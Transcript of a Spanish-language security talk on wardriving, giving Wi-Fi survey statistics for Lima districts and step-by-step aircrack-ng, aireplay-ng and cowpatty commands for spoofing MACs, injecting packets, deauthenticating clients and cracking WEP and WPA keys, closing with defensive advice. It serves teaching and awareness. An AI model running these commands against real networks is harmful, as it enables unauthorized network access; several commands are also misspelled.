¿Qué es Wardriving?
Transcripción
¿Qué es Wardriving?
Omar Palomino - CEH Consultor en Seguridad de Información aula H4XOR Estadísticas de seguridad en Lima Metropolitana Técnicas para penetrar redes WEP Técnicas para penetrar redes WPA Demostración en vivo Omar Palomino Wardriving and wireless penetration testing ¿Quién soy? • Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas • Consultor en Seguridad de información - Digiware, CEH • “10 años” de experiencia en seguridad de información • Psicólogo que aun no comienza sus estudios…. • Escritor en mis tiempos libres: http://www.el-palomo.com ¿Qué es Wardriving? Es la búsqueda de redes inalámbricas Wi-Fi desde un vehículo en movimiento. Cuando se realiza la misma actividad caminando se le llama “warwalking”. ¿Qué es Wardriving? Los hackers pintaban señales en las calles para “documentar” las redes encontradas. ¿Nunca has visto esos símbolos? En la actualidad se usan dispositivos GPS y GoogleEarth para documentar las redes encontradas. ¿Nunca has visto esos símbolos? ¿Nunca has visto esos símbolos? Inicio del proyecto: 01 Abril, 2011 Distritos: Cercado Callao San Isidro San Miguel Miraflores La Molina Los Olivos San Borja Proyecto Wardriving Proyecto Wardriving Redes WiFi – Lima Metropolitana 1% 29% WEP: 28 531 redes WPA :11 713 redes Abiertas: 322 redes 70% WEP WPA Abiertas Proyecto Wardriving DEMOSTRACIÓN DE WARDRIVING ¿Es posible hackear redes WIFI? WIRELESS WEP • • • Sí, se puede hackear. Capturar 40 mil – 120 mil paquetes Tarda entre 10 min – 20 min WAP • • • Depende de la complejidad de la contraseña. Rainbow tables Tiempo indeterminado Características WEP RC4 = Rivest Cipher #4 Ataques FMS optimizado H1KARI Ataques KoreK (IVs únicos) 2004 se publica Aircrack poniendo en práctica los ataques KoreK La incorporación de inyección de paquetes mejoro sustancialmente los tiempos Características WPA WPA Modo Enterprise Modo Personal WPA2 Autenticación 802.1X / EAP Autenticación 802.1x / EAP Encriptación TPKI / MIC Encriptación AES - CCMP Autenticación: PSK Autenticación: PSK Encriptación TPKI / MIC Encriptación AES - CCMP Vulnerando redes WEP Vamos a la práctica – en vivo Vulnerando redes WEP Capturando paquetes Shell# Airmong –ng Shell# macchanger –mac 00:11:22:33:44:55 Shell# airmong start wlan0 <channel> Shell# airodump-ng mon0 Shell# airodump-ng –c <channel> -w <file> --bssid <bssid> mon0 Inyectando paquetes Shell# aireplay-ng -1 0 –a <bssid> -h 00:11:22:33:44:55 mon0 Shell# aireplay-ng -3 –b <bssid> -h 00:11:22:33:44:55 mon0 Obteniendo la contraseña Shell# aircrak-ng –b <bssid> <file.cap> Vulnerando redes WEP Vulnerando redes WPA Vamos a la práctica – en vivo Vulnerando redes WPA PSK= PMK = PBKDF2 (frase, SSID, longitud SSID 4096,256) Capturamos sólo el Handshake Ataque 0 – deautenticación Shell# aireplay –0 5 –a 00:30:BD:98:CE:62 –C 00:15:E9:B1:33:53 mon0 -0 = ataque de des-autenticación 5 = número de segundos que durará el ataque -a = BSSID del AP -c = mac del cliente Vulnerando redes WPA Comprobamos que hemos capturado el handshake: Shell# aircrak-ng <file.cap> Necesitamos un diccionario! 3 Métodos de craking 1. Aircrack + Diccionario Shell# aircrak-ng –w <diccionario_ruta> <handshake.cap> 2. Cowpatty + Diccionario (excesivo procesamiento) Shell# cowpatty –f <diccionario_ruta> -r <handshake.cap> -s SSID 3. Cowpatty + genpmk (muy rápido, 20000 palabras por segundo) Shell# genpmk –f <diccionario_ruta> -d HASHFILE –s SSID Shell# cowpatty –r <handshake.cap> -d HASHFILE –s SSID ¿Cómo evito que me hackeen? Olvídate de WEP, ni siquiera lo pienses!! Sí, a ti te digo! Utiliza WPA con una contraseña con criterios de dificultad Filtrado MAC y ocultar el SSID, tampoco lo pienses! “Existen algunas soluciones que brindan WIDS/WIPS” Gracias por participar muy pronto estamos en provincias para más información ingresa a nuestra web En el 2012 mucho más de nosotros… [email protected]